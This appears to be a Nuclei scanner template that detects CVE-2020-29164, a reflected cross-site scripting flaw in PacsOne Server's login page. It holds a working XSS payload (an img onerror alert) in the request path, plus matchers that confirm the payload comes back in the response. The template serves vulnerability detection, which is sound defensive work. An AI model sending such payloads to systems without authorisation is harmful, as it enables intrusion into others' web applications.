46 lines
1.1 KiB
YAML
46 lines
1.1 KiB
YAML
id: CVE-2020-29164
|
|
|
|
info:
|
|
name: PacsOne Server <7.1.1 - Cross-Site Scripting
|
|
author: geeknik
|
|
severity: medium
|
|
description: PacsOne Server (PACS Server In One Box) below 7.1.1 is vulnerable to cross-site scripting.
|
|
reference:
|
|
- https://gist.github.com/leommxj/0a32afeeaac960682c5b7c9ca8ed070d
|
|
- https://pacsone.net/download.htm
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-29164
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2020-29164
|
|
cwe-id: CWE-79
|
|
cpe: cpe:2.3:a:rainbowfishsoftware:pacsone_server:*:*:*:*:*:*:*:*
|
|
epss-score: 0.00159
|
|
tags: pacsone,xss,cve,cve2020
|
|
metadata:
|
|
max-request: 1
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/pacs/login.php?message=%3Cimg%20src=%22%22%20onerror=%22alert(1);%22%3E1%3C/img%3E"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
|
|
- type: word
|
|
words:
|
|
- "text/html"
|
|
part: header
|
|
|
|
- type: word
|
|
words:
|
|
- '<img src="" onerror="alert(1);">1</img>'
|
|
part: body
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# Enhanced by mp on 2022/08/15
|